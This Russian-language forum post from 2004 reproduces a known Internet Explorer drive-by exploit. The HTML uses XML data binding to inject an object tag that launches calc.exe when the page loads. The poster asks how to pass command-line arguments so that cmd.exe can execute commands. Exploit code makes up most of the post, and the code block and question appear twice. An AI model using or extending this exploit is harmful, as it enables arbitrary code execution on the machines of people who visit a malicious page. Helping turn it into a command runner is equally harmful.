28.06.2004, 13:30
Всем известен кусок кода, запускающий калькулятор:
<span datasrc="#oExec" datafld="exploit"
dataformatas="html"></span>
<xml
id="oExec">
<security><exploit><![CDATA[
<object id="oFile"
classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/WINDOWS/calc.exe"></object>
]]></exploit></security>
</xml>
Вопросик:Как ещё передать параметры командной строки?Не выходит, ну например запустить cmd.exe с параметром echo aaa>1.txt???
<span datasrc="#oExec" datafld="exploit"
dataformatas="html"></span>
<xml
id="oExec">
<security><exploit><![CDATA[
<object id="oFile"
classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/WINDOWS/calc.exe"></object>
]]></exploit></security>
</xml>
Вопросик:Как ещё передать параметры командной строки?Не выходит, ну например запустить cmd.exe с параметром echo aaa>1.txt???